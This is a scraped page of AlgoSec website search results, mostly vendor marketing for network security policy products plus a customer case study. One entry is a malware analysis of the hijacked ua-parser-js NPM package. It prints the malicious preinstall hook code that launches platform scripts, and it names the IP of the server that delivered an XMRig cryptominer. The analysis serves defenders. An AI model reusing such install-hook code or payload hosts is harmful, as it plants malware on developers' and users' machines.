top of page

Search results

638 results found with an empty search

  • AlgoSec AppViz – Application visibility for AlgoSec Firewall Analyzer | AlgoSec

    Gain in-depth application visibility with AlgoSec AppViz for Firewall Analyzer. Optimize security policies and uncover application risks across your network. AlgoSec AppViz – Application visibility for AlgoSec Firewall Analyzer ------- ---- Select a size ----- Get the latest insights from the experts Choose a better way to manage your network

  • Multi-Cloud Security Network Policy and Configuration Management | AlgoSec

    Manage multi-cloud security with effective policy and configuration strategies to ensure compliance, optimize performance, and protect your network infrastructure. Multi-Cloud Security Network Policy and Configuration Management Taking advantage of cost and performance improvements, enterprises are extending their networks far beyond the traditional perimeter to incorporate multiple public and private clouds. Migration of applications to clouds has become an indispensable strategy for enterprises as clouds deliver many financial, performance and other advantages. Public clouds have become part of the computing fabric of millions of enterprises. Overview Digitally transforming their businesses with numerous new applications, mobility and big data, enterprises are rapidly expanding their networks. Taking advantage of cost and performance improvements, enterprise networks extend way beyond the traditional perimeter and now incorporate software-defined networks (SDN), micro-segmentation and multiple clouds. The typical medium or large enterprise now manages a dynamic heterogeneous network that includes: Data centers Public clouds Private clouds Traditional network security policy management within the data center has always been challenging enough. Multiple firewalls from different vendors, thousands of rules and hundreds of weekly or monthly changes call for their own careful management and automation. But as the network estate becomes even wider and more complex, coherent security policy now has to extend across the entire heterogeneous network that includes multiple public clouds (e.g., AWS, MS Azure, Google Cloud Platform), each with its own language and methods. In the world of multi-cloud deployments, the need for cloud vendor-agnostic, holistic security policy automation becomes essential. In this paper, we will discuss the major security policy issues that concern enterprises as they expand their networks across multiple clouds. We will explain how AlgoSec delivers a comprehensive, unified, vendor-agnostic automation solution that enables security managers to reduce risk, improve compliance and boost efficiency across the heterogeneous network including multi-clouds. Introduction In the data center, AlgoSec automates network security policy in device vendor-agnostic fashion—that is, it provides a unified console from which security teams can holistically manage security policy across multiple data centers and network segments that include many firewalls and other network devices. The AlgoSec solution is vendor-agnostic, enabling security teams to use a common security interface to handle policy management regardless of type of network device. The AlgoSec solution is able to tie security-policy management to business processes and applications, proactively assessing risk, and ensuring continuous compliance in addition to quick provisioning, change, migration and decommissioning of network connectivity for business applications. That businesses are migrating applications to private and public clouds doesn’t change anything for AlgoSec. Neither do virtualization nor multi-cloud deployments. In fact, the accelerating deployment of heterogeneous networks greatly increases the need for an automated Network Security Policy Management (NSPM) solution like AlgoSec. Where the data center meets the cloud The network landscape of today differs radically from what we knew only a few years ago. For a variety of quantifiable reasons that include productivity, agility and costs, enterprises are migrating their applications to public and private clouds. Public clouds Migration of applications to public clouds has become an indispensable strategy for enterprises as public clouds bring a great many advantages. The most popular of the public clouds, AWS, Microsoft Azure and Google Cloud Platform, have become part of the computing fabric of millions of enterprises. Because of the proliferation of easy-to-use and cost-effective public clouds, enterprises leverage multiple cloud vendors. IDC estimates that nearly 80 percent of IT organizations are currently deploying, or are planning to deploy, multi-cloud environments. A study conducted by Microsoft and 451 Research, The Digital Revolution Powered by Cloud, stated that nearly a third of organizations already work with three or four cloud vendors. The embracing of the multi-cloud environment can be attributed to the advantages each cloud vendor has to offer such as unique functions, proximity and pricing models. Since application requirements can vary greatly and require specific functions and capabilities to operate optimally, matching them to specific cloud vendors is important. Various cloud environments offer the functions and tools that deliver the best capabilities for each application. Some public clouds excel in cost advantages, others in availability, still others in compute power. Businesses evaluate the advantages of each cloud to take advantage of the functions that will best support each application. Enterprises also worry about lock-in—a commitment to a single cloud vendor—that might turn them into a captive customer allowing that vendor to dictate the terms of service and costs. Businesses avoid lock-in by deploying applications across multiple clouds. Private clouds As enterprises transform digitally, their data and applications grow exponentially. Network managers are constantly challenged to re-consider the network infrastructure that will best support business needs now and into the foreseeable future. Today, private cloud is one of their main considerations. Private cloud is a type of cloud computing that delivers advantages similar to public cloud, including scalability and self-service, but through a proprietary architecture that the enterprises maintain themselves. While public clouds deliver services to any number of enterprises, a single enterprise establishes its own private cloud dedicated to its own needs. Therefore, private cloud is the best choice for enterprises who wish to control all the aspects of their computing and where it is easier to manage security and regulatory compliance. According to Market Research Future, the global private cloud market, although not as widely adopted as the public cloud, is still expected to grow explosively at 26% CAGR between 2017 and 2023 and reach a valuation of more than USD 50B by 2023. Get a demo Hybrid networks As a result of the distinct advantages and disadvantages of each type of cloud implementation, most enterprises utilize two or three types of environments: traditional data center processing, private clouds and public clouds; and in many cases, employing multiple vendors for the cloud environments. Taken together, they give rise to the heterogeneous network environment or hybrid network . Migration to the cloud and virtualization – a growing trend Running applications across the hybrid network can prove eminently useful for business teams but extraordinarily challenging for security teams. The complexity of the heterogeneous environment introduces a new level of security policy management challenges. We identify seven major challenges that must be addressed to ensure security and compliance across hybrid networks. 1. Visibility The more heterogenous the network, the more complex it becomes. Complexity is the enemy of security. Across the vast landscape of physical equipment, virtual firewalls, and public-cloud network security groups, security teams find it difficult to obtain a clear picture of application-connectivity requirements and overall network security. You can’t protect what you can’t see. Visibility is essential to security and rapid incident response. Obtaining full visibility across the entire hybrid network requires a deep understanding of the hybrid network’s topology and the flows between: On-premise networks and cloud providers Multiple public cloud environments VPCs and v-NETs Regions within the same cloud providers Cloud environments and the internet A study sponsored by Forbes surveyed professionals in enterprise IT departments about their cloud infrastructures. More than one-third said they lack visibility into their application operations in the public cloud. The independent market research company, Vanson Bourne, conducted a survey to investigate the state of network security. In Hide and Seek: Cybersecurity and the Cloud , two-thirds of respondents cited network “blind spots” as a major obstacle to effective data protection. Ixia’s recent survey of senior IT staff in various organizations regarding their cloud security concerns concurred. The top concern with cloud adoption was the ability to achieve full visibility. 2. Maintaining compliance posture Put bluntly, compliance is absolutely necessary for the business but is a nuisance for the IT staff. With the recent introduction of the GDPR and the growing body of legal and industrial regulations, compliance is taking up more and more effort and time from IT departments and especially security staff. Keeping up with the numerous regulations that are found in a growing number of geographies and industries is challenging enough in a single-cloud-provider environment. Compliance challenges multiply rapidly in heterogeneous environments due to: The need to apply compliance processes for each regulation for each network entity Service contract terms and SLAs across the estate Compliance methodologies that work for one cloud vendor don’t necessarily work for another Audits are point-in-time exercises, but most regulations require continuous compliance, tough to achieve in a dynamic environment Compliance needs to be documented for every entity and vendor, very tedious and time-consuming, and a drain on scant resources The essence of information security regulations such as PCI-DSS, GLBA and HIPAA is to ensure the confidentiality and integrity of sensitive information. While these regulations are addressed by the best practices that IT departments have continuously implemented for years, the challenges are rapidly expanding in the heterogeneous environment. Due to the chronic lack of IT and security staff, teams are incessantly pulled in different directions. In many cases, it’s gotten to the point where IT staff are busy putting out security and operational fires and have little time to perform critical strategic work such as addressing compliance issues at the network and cloud level. Multiple clouds just make the task that much harder. 3. Identifying and mitigating risks Due to the dynamic nature of the hybrid (on-prem and cloud) network, numerous changes to security policies are likely to ensue. These changes will be implemented on all the devices that direct traffic and will likely be performed by the multiple stakeholders involved in the hybrid network such as application developers and DevOps in addition to cloud and security teams. The ever-transforming environment necessitates close attention as risk may be introduced inadvertently by these changes. The risks within the complex hybrid-cloud estate will likely be too numerous and complex to be identified manually. Therefore, it’s imperative to obtain a dashboard that depicts all risks on a single screen. This dashboard should indicate the severity, the affected devices and rules, and the changes required to remediate each risk. The dashboard also requires the ability to notify pro-actively (via alarm) whenever the network is exposed to new risks. 4. Managing application connectivity The growing body of applications requires a complex, multi-tiered, distributed and interconnected architecture supported by elaborate communication paths that cross other applications, servers and databases. A Symantec analysis found that while most CIOs think their organizations use only 30 or 40 cloud applications , in fact, most have adopted an average of 928! Even if they get a grip on their current application volume, network and security teams can’t consider themselves in control. There are constant upgrades and changes, as well as new applications to deploy, connect and secure. Business users demand that they be up and running immediately while security is hard-pressed to keep up. Trying to manage application connectivity across on-premise, private and public clouds, each with multiple vendors, is prohibitively expensive in time and effort. 5. Managing policies Maintaining a clean set of firewall rules is a critical network-management function. Difficult enough in the data center, things really get out of hand when networks cross borders into the cloud. Private clouds add unique security controls such as ACI contracts and distributed firewalls. And each public cloud has its unique security controls such as cloud-native security groups, cloud-vendor firewalls (e.g., Azure firewall and AWS WAF), and 3rd-party cloud firewalls by the traditional firewall vendors (e.g., CloudGuard from Checkpoint and Palo Alto Networks’ VM series). The proliferation of security controls that make up the hybrid, multi-cloud network multiplies policy-management complexity. Maintaining a clean set of firewall rules is a critical firewall management function. Difficult enough in the data center, things really get out of hand when networks cross borders into the cloud. Adding more than one cloud further multiples the policy-management complexity. Unwieldy rulesets are not just a technical nuisance, they also introduce business risks, such as open ports, unneeded VPN tunnels and conflicting rules that create the backdoor entry points that hackers love. Bloated rulesets significantly complicate auditing processes that require the careful review of each rule and its related business justification. Examples of firewall rules that institute problems include: Unused rules Shadowed rules Expired rules Unattached objects (rules that refer to non-existent entities such as users who have left the company) Rules that are not ordered optimally (e.g., the rule that is “most hit” is near the bottom of the rule list) These problems drive organizations to take on ad hoc firewall “cleanup” or “recertification” projects. The problems are magnified in enterprises with: A large number of traditional physical firewalls Firewalls from multiple vendors (Checkpoint, Cisco, Palo Alto Networks) Different types of platforms (on-prem, private cloud, public cloud) Different types of security controls (traditional firewalls, security groups, etc.) Such complexities contribute to a lack of visibility, poor accountability, and undetected network breaches. They accumulate unnecessary costs for the business and waste precious IT time. Enterprises across the board are well aware of the need to get a handle on security controls. Research by ESG indicates that 70 percent of organizations plan to unify security controls for all server workloads across public clouds and on-premises resources over the next two years. 6. Enforcing security-policy consistency The only constant in today’s IT environment is change. Today, change occurs at a breakneck pace. As business needs transform (due to rapid business growth, mergers and acquisitions, new applications, decommissioning of old applications, new and departing users, evolving networks, new cyber threats), so must security policies—and fast. Managing change can lead to major headaches for IT, security and cloud management teams who try to enforce consistent security policies across the heterogenous network. Maintaining consistency across the hybrid and multi-cloud network meets with many problems such as: Each security entity has a different method of managing policy changes. Lack of intricate understanding of the proper management of changes for each security entity can lead to critical business risks as benign as legitimate traffic blockage all the way to the entire business network going offline. Manual workflows and change management processes that are unique for each security entity can substantially slow down the change process, impeding IT agility. Some enterprises with a very complex heterogeneous network are so concerned about change control and its potential negative impact that they may resort to network freezes during peak business times so as not to suffer inexplicable outages. Changes are slow. It can take several days—sometimes weeks—to process a single change in a complex enterprise environment. Enterprises may implement hundreds of changes each month. It’s difficult to assess the risk of a proposed change. The change process in a hybrid network involves disparate teams (security, networking, cloud, business owners). These teams speak different languages and have different objectives. They lack a unifying factor. 7. Handling multiple management consoles Each cloud vendor provides its own console that facilitates the day-to-day management of its cloud accounts and provides services such as monitoring cloud-resource usage, calculating current costs and managing security credentials. In addition, each firewall vendor offers its own unique management console for managing all of its devices. Each vendor’s console comes with its own language and GUI. To make network-wide policy changes that span firewalls and clouds, security staff must access multiple consoles forcing enterprises to employ a legion of experts just to implement even a simple change. Changes have to be meticulously coordinated across the many management consoles slowing down progress and introducing potential for errors. 8. Lack of skilled staff with cloud-security knowledge Despite all the advancements we have made in network security in recent years, enterprises still endure regular cyberattacks that continue to cause billions of dollars in damages. Effective network security professionals are now more important than ever. Yet, despite the urgent need (and handsome salaries), the world suffers from a severe scarcity in able and certified personnel. According to a recent McAfee study titled The ramifications of the skills shortage on cloud security, IT leaders need to increase their security staffs by 24% to adequately manage their current threat landscape. But these people are simply not available. The absence of adequately trained security professionals leaves gaps in many aspects of modern-day security infrastructure. In their report on security deficiencies , ESG found that 33% of responders indicated that their biggest deficiency was cloud security specialists followed by 28% who pointed to a deficiency in network security specialists and 27% who suffer a shortage of security analysts. A security officer with expertise in any cloud environment needs to be familiar with the best practices of incident response and must also be proficient in cloud security practices such as identity access management (IAM), deployment automation and cloud regulatory compliance. The requisite qualifications are amplified when the same officer needs to manage multiple cloud vendors. As security varies with each vendor, the multi-cloud security officer must know the security nuances of each cloud vendor and stay up to date with the ongoing security advancements of each. It is practically impossible to find such people. Many network and cloud security positions remain unfilled forcing organizations to compromise. Network security challenges in the hybrid network AlgoSec delivers business-driven security management across on-premise, SDN, hybrid-cloud and multi-cloud environments. With AlgoSec, enterprises maintain a uniform security policy across their entire network estate. From a single console, security teams can see across their on-prem and virtual networks and into all their clouds. They obtain accurate policy change automation across their physical and virtual firewalls as well as into their public cloud deployments. The AlgoSec approach bestows numerous critical benefits on the enterprise: Visibility across the hybrid cloud and multi-cloud from a business-application perspective Uniform security policy across complex hybrid cloud and multi-cloud environments Compliance assurance across the hybrid cloud and multi-cloud environments Hybrid-cloud and multi-cloud security policy change automation with zero touch Increased agility and responsiveness to business needs Accelerated application delivery Optimal training of security personnel—one console, one language—for the entire heterogeneous network The AlgoSec solution for heterogeneous environments AlgoSec delivers the acute visibility, automation and unified solution for managing the entire volume of hybrid-cloud security policies, configurations and controls to achieve and maintain security and compliance. Maintaining a robust security posture in such a complex environment that includes on-premise network equipment from multiple vendors, SDN, virtual, private and public cloud infrastructures necessitates automation . AlgoSec is the leading automation solution for network security policy management. Used by 1,800 customers in over 80 countries, AlgoSec delivers end-to-end visibility and analysis of the hybrid network security infrastructure (including real and virtual firewalls, routers and cloud security groups), as well as business applications and their connectivity flows—across cloud, SDN and on-premise enterprise networks. AlgoSec automates time-consuming and error-prone manual security-policy changes with zero touch, proactively assessing risk and ensuring continuous compliance. AlgoSec quickly provisions, modifies, migrates and decommissions network connectivity for business applications. To discover more about AlgoSec’s business-driven security management solution, visit www.algosec.com , or click here to request a demo. Executive summary Select a size Overview Introduction Where the data center meets the cloud Migration to the cloud and virtualization – a growing trend Network security challenges in the hybrid network The AlgoSec solution for heterogeneous environments Executive summary Get the latest insights from the experts Choose a better way to manage your network

  • AlgoSec platform solution brochure - AlgoSec

    AlgoSec platform solution brochure Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • Rescuing your network with micro-segmentation

    Given the benefits of a micro segmentation strategy, it is worth understanding how to navigate these common challenges, and move towards a more consolidated, secure network Webinars Rescuing Your Network with Micro-Segmentation Cybersecurity has turned into a top priority as hackers grow more sophisticated. Micro-segmentation is a protective measure that allows you to put in gateways separating specific areas. This buffer can serve as a major deterrent keeping criminals from attacking sensitive data, and providing you with the ability to minimize the damage caused by unauthorized intrusions. It can also help with detection of weak points which expose your network to breaches. Join our panel of experts to learn how to plan and build your micro-segmentation strategy while avoiding common pitfalls along the way. In this session, we will discuss: The basics of micro-segmentation and it can help your network Why today’s environment has contributed to a greater need for micro-segmentation How to spot and avoid critical errors that can derail your micro-segmentation implementation July 5, 2021 Alex Hilton Chief Executive at Cloud Industry Forum (CIF) Prof. Avishai Wool CTO & Co Founder AlgoSec Relevant resources Building a Blueprint for a Successful Micro-segmentation Implementation Keep Reading Micro-Segmentation Implementation - Taking the Leap from Strategy to Execution Keep Reading Micro-segmentation – from strategy to execution Keep Reading Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • Sunburst Backdoor - A deeper look into The SolarWinds’ Supply Chain Malware - AlgoSec

    Sunburst Backdoor - A deeper look into The SolarWinds’ Supply Chain Malware Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | Hijacked NPM Account Leads to Critical Supply Chain Compromise

    As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package... Cloud Security Hijacked NPM Account Leads to Critical Supply Chain Compromise Rony Moshkovich 3 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/21 Published As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don’t realize something was up, luckily the effect is quite the contrary). I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0 I have sent a message to NPM support since I can’t seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish ) so I can only deprecate them with a warning message. There are more than 2.5 million other repositories that depend on ua-parser-js . Google search “file:ua-parser-js.js” reveals nearly 2 million websites, which indicates the package is popular. As seen in the source code diff , the newly added file package/preinstall.js will check the OS platform. If it’s Windows, the script will spawn a newly added preinstall.bat script. If the OS is Linux, the script will call terminalLinux() function, as seen in the source below: var opsys = process.platform; if ( opsys == "darwin" ) { opsys = "MacOS" ; } else if ( opsys == "win32" || opsys == "win64" ) { opsys = "Windows" ; const { spawn } = require ( 'child_process' ) ; const bat = spawn ( 'cmd.exe' , [ '/c' , 'preinstall.bat' ]) ; } else if ( opsys == "linux" ) { opsys = "Linux" ; terminalLinux () ; } The terminalLinux() function will run the newly added preinstall.sh script. function terminalLinux(){ exec( "/bin/bash preinstall.sh" , (error, stdout, stderr) => { ... }); } The malicious preinstall.sh script first queries an XML file that will report the current user’s geo-location by visiting this URL . For example, for a user located in Australia, the returned content will be: [IP_ADDRESS] AU Australia ... Next, the script searches for the presence of the following country codes in the returned XML file: RU UA BY KZ That is, the script identifies if the affected user is located in Russia, Ukraine, Belarus, or Kazakhstan. Suppose the user is NOT located in any of these countries. In that case, the script will then fetch and execute malicious ELF binary jsextension from a server with IP address 159.148.186.228, located in Latvia. jsextension binary is an XMRig cryptominer with reasonably good coverage by other AV products. Conclusion The compromised ua-parser-js is a showcase of a typical supply chain attack. Last year, Prevasio found and reported a malicious package flatmap-stream in 1,482 Docker container images hosted in Docker Hub with a combined download count of 95M. The most significant contributor was the trojanized official container image of Eclipse. What’s fascinating in this case, however, is the effectiveness of the malicious code proliferation. It only takes one software developer to ignore a simple trick that reliably prevents these things from happening. The name of this trick is two-factor authentication (2FA). About the Country Codes Some people wonder why cybercriminals from Russia often avoid attacking victims outside of their country or other Russian-speaking countries. Some go as far as suggesting it’s for their own legal protection. The reality is way simpler, of course: “Не гадь там, где живешь” “Не сри там, где ешь” “Не плюй в колодец, пригодится воды напиться” Polite translation of all these sayings is: “One should not cause trouble in a place, group, or situation where one regularly finds oneself.” Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* Phone number* country* Select country... By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • A guide to application-centric security and compliance management - AlgoSec

    A guide to application-centric security and compliance management WhitePaper Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • Strategic consulting – Blueprint for success - AlgoSec

    Strategic consulting – Blueprint for success Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec Horizon Platform Solution brief - AlgoSec

    AlgoSec Horizon Platform Solution brief Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • Cloud security configuration and policy management - AlgoSec

    Cloud security configuration and policy management Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • Cessation of Misconfigurations: Common Network Misconfiguration Risks & How to Avoid Them | AlgoSec

    Best practices for network security governance in AWS and hybrid network environments Webinars Cessation of Misconfigurations: Common Network Misconfiguration Risks & How to Avoid Them Avivi Siman-Tov, AlgoSec’s Director of Product | February 18, 2020 Misconfigurations aren’t simply inconvenient mistakes but serious security threats. According to Gartner, 99% of all firewall breaches will be caused by misconfigurations by 2020 and misconfigurations made OWASP’s list of Top 10 most critical web application security risks. A single change to a network device can have far-reaching effects on your business and create security holes for cybercriminals, impact your audits, and cause costly outages that bring your business to a standstill. In this webinar, Avivi Siman-Tov, AlgoSec’s Director of Product, will show examples of common misconfigurations, including device changes, business application connectivity changes, and data center migrations. He will also reveal specific techniques to help you avoid them. Watch the webinar to learn how to: Understand and map your entire network before you make a change Proactively assess the impact of a change to ensure it does not break connectivity, affect compliance or create a security hole and understand the impact of changes to your entire network Maximize the capabilities of network management automation to avoid common misconfigurations Avoid common mistakes when making changes to your network security devices February 18, 2020 Avivi Siman Tov Director of Product Relevant resources Firewall Rule Recertification - An Application-Centric Approach Keep Reading Securing & managing hybrid network security See Documentation Application first cloud security See Documentation Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... phone By submitting this form, I accept AlgoSec's privacy policy Continue

  • Orange Cyberdefense | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Orange Cyberdefense Furnishes Application Delivery and Network Automation Organization Orange Cyberdefense Industry Retail & Manufacturing Headquarters Multinational Download case study Share Customer
success stories "We cut the time it takes to implement firewall rules by at least 50%" Application owners for global retail chain get faster response times with application visibility and automated deployment. Orange Cyberdefense is the expert cybersecurity business unit of the Orange Group, providing managed security, managed threat detection & response services to organizations around the globe. They embed security into Orange Business Services solutions with more than 250 security researchers and analysts and 16 SOCs distributed around the world supporting customers in over 160 countries. The Challenge Orange Cyberdefense is an on-site consultant for a large retail chain with hundreds of stores and hundreds of thousands of employees spread out across the world.The client has over 2,500 multi-vendor firewalls and Layer 3 devices in their global data centers. They also run hundreds of mission-critical business services. Business services include supply chain management and ERP systems, global eCommerce operations, financial management systems, and much more. As a result, they had to cope with hundreds of change requests daily.Some of the challenges included: Lack of centralized management – Multiple vendors’ firewalls are deployed, which were implemented by multiple third-party vendors. There was no validation that rules were consistently applied across multiple vendor’s management consoles. Commissioning and decommissioning devices – A mix of multi-vendor new and legacy devices run in the data center and maintaining consistency across multiple vendors and multiple versions of devices was difficult. Lack of automation – Firewall communication and traffic flows were described in Excel sheets and needed to be manually updated whenever there was a change. Slow execution of change requests – Implementing firewall changes took over a week. Poorly implemented rules – The rules did not reflect what the requester asked for. They either allowed too much traffic in or were too narrow, not allowing the required traffic and thus needed to be re-implemented. The Solution The client searched for a solution that provided: Faster implementation of firewall changes. Comprehensive firewall support for a globally dispersed multi-vendor, hybrid estate. Automation of security policy change management and documentation of security policy changes. Visibility into their business applications and traffic flows. They implemented the AlgoSec Security Policy Management Solution, made up of AlgoSec Firewall Analyzer, AlgoSec FireFlow, and AlgoSec AppViz and AppChange (formerly AlgoSec BusinessFlow). AlgoSec Firewall Analyzer analyzes complex network security policies across on-premise, cloud, and hybrid networks. It automates and simplifies security operations, including troubleshooting, auditing and risk analysis. Using Firewall Analyzer, the client can optimize the configuration of firewalls, and network infrastructure to ensure security and compliance. AlgoSec FireFlow enables security staff to automate the entire security policy change process from design and submission to proactive risk analysis, implementation, validation, and auditing. Its intelligent, automated workflows save time and improve security by eliminating manual errors and reducing risk. AlgoSec AppViz and AppChange (formerly AlgoSec BusinessFlow) discover, identify, and map business applications, providing critical security information regarding the firewalls and firewall rules supporting each connectivity flow. With AlgoSec AppChange, changes can be made at the business application level, including application migrations, server deployment, and decommissioning projects. The Results Some of the ways the client benefits from using AlgoSec include: Greater transparency by providing a single source of truth that took into consideration the entire network estate. 50% reduction in the time needed to implement firewall rules. More communication between network security/IT staff and business application owners who are now able to submit change requests in business language and easily describe their needs, thus reducing misconfigurations and potential breaches. Better compliance reporting – with both an easy API integration and also audit-ready compliance reports. Automated change management – network changes are now recorded while being made – not managed with Excel. By using AlgoSec, application owners have more visibility into the network and are better able to trace what has changed within their business applications. “Documentation is several hundred percent better this way,” said Hans Broomé, Network and Security Consultant at Orange Cyberdefense. “With many different versions of the services, by using AlgoSec the IT team is confident that they are making changes to the correct version.” There were even unexpected gains, such as improved security management procedures. Change requests became more accurate as they gained visibility into the network and made the change request process more systematic and transparent. Requesters, as well as stakeholders such as their managers, have full visibility of their change request’s status and can verify that the request works as intended. Orange Cyberdefense is also impressed with the dedicated attention they receive from AlgoSec. AlgoSec’s support team is familiar with the global organization and provides dedicated attention tailored to their exact needs. They stay up to date with the AlgoSec solution’s latest capabilities, and the technical team maximizes their use of it thanks to an extensive training library. “The best is yet to come,” concluded Broomé. Schedule time with one of our experts

bottom of page